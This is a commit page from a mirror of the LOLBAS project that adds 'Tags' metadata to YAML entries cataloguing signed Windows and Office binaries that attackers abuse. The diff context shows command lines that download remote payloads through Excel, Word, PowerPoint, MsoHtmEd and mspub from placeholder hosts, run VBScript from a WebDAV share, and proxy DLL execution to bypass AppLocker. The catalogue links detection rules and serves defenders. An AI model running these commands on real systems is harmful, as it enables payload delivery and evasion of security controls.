public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-25 19:53:08 +02:00
Code Issues Projects Releases Wiki Activity

Adding tags (closes #9, #318) (#362)

Browse Source 
* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze
2024-04-03 16:53:36 +01:00
committed by GitHub
parent a945bac6be
commit ebbf08ec4d
65 changed files with 229 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OtherMSBinaries/AccCheckConsole.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

2
yml/OtherMSBinaries/Appvlp.yml
View File

@@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources:

14
yml/OtherMSBinaries/Bginfo.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript
@@ -18,12 +20,16 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: Execute
Privileges: User
MitreID: T1218
Tags:
- Execute: WSH
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -39,6 +47,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
@@ -46,10 +56,10 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: WSH
Full_Path:
- Path: No fixed path
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

7
yml/OtherMSBinaries/Coregen.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1055
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
Usecase: Execute DLL code
@@ -25,6 +27,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@@ -42,8 +46,5 @@ Resources:
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
- Person: Nicky Tyrer
Handle:
- Person: Evan Pena
Handle:
- Person: Casey Erikson
Handle:

4
yml/OtherMSBinaries/Excel.yml
View File

@@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe

4
yml/OtherMSBinaries/MsoHtmEd.yml
View File

@@ -6,11 +6,13 @@ Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe

4
yml/OtherMSBinaries/Mspub.yml
View File

@@ -6,11 +6,13 @@ Created: 2022-08-02
Commands:
- Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe

4
yml/OtherMSBinaries/Powerpnt.yml
View File

@@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe

8
yml/OtherMSBinaries/Procdump.yml
View File

@@ -12,14 +12,18 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
Full_Path:
- Path: no default
Detection:

3
yml/OtherMSBinaries/Te.yml
View File

@@ -18,6 +18,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: no default
Detection:

4
yml/OtherMSBinaries/Tracker.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path:
- Path: no default
Code_Sample:

6
yml/OtherMSBinaries/Winword.yml
View File

@@ -6,11 +6,13 @@ Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@@ -28,8 +30,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
- IOC: Suspicious Office application Internet/network traffic

2
yml/OtherMSBinaries/vsls-agent.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Tags:
- Execute: DLL
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:

2
yml/OtherMSBinaries/vstest.console.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe